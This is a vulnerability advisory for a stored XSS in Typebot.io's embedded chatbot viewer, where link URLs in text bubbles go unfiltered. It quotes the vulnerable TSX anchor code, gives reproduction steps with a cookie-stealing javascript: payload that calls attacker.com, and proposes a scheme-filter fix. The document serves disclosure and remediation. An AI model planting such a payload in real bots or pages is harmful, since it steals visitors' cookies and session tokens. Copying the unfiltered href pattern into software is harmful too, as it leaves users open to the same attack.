CVE-2026-39964

MEDIUM5.4EPSS 0.05%

Typebot.io has stored XSS via `javascript`: URI in text bubble links — bot author executes JS on visitors' browsers

Published: 5/26/2026Modified: 5/26/2026
Also known as:GHSA-hqmv-v56g-4m47

Description

### Summary The Typebot viewer (`packages/embeds/js`) renders anchor tags from rich text bubble content without filtering the `javascript:` URI scheme. A bot author can set a link URL to `javascript:PAYLOAD`, which executes in the visitor's browser context when clicked. Since the viewer is typically embedded in a third-party site, the attacker's JavaScript runs in the host page's origin and can exfiltrate cookies and session tokens. ### Details Vulnerable file: `packages/embeds/js/src/features/blocks/bubbles/textBubble/components/plate/PlateBlock.tsx` ```tsx // Line 32 — href set directly from stored bot content, no javascript: filtering <a href={elementDescendant.url as string} target="_blank" rel="noopener noreferrer"> {elementDescendant.children[0].text} </a> ``` SolidJS does not sanitize `href` attribute values — `javascript:` URIs pass through to the DOM unchanged. The same issue exists in `ImageBubble.tsx` line 102 for image link wrapping. ### Steps to Reproduce ``` 1. Log in to Typebot as an authenticated user (any plan) 2. Create a new bot 3. Add a Text Bubble block 4. In the rich text editor, type any link text and set the URL to: javascript:fetch('https://attacker.com/?c='+document.cookie) 5. Publish the bot and open the live/embedded viewer 6. Click the link in the chatbot interface 7. The JavaScript executes in the browser — cookie exfiltration request sent to attacker.com ``` Source-verified: `PlateBlock.tsx:32` renders `<a href={url}>` with no scheme filtering. Puppeteer alert confirmed `document.domain` execution when link clicked. ### Impact - Any authenticated Typebot user (including free tier) can create a bot with this payload - When shared or embedded in a third-party site, clicking the link executes JS in the host page's origin - Allows stealing cookies, session tokens, or any data accessible to the embedding page - Shared bots are publicly accessible — no victim authentication required ### Proposed Fix Filter `javascript:` URIs before rendering anchor tags: ```tsx const safeUrl = (url: string) => /^javascript:/i.test(url.trim()) ? '#' : url <a href={safeUrl(elementDescendant.url as string)} ...> ``` Alternatively, use a URL allowlist (only `https:`, `http:`, `mailto:`, `tel:`).

Affected packages (1)

CVSS scores

SourceVersionSeverityVector
osvCVSS 3.1MEDIUM5.4CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

References (5)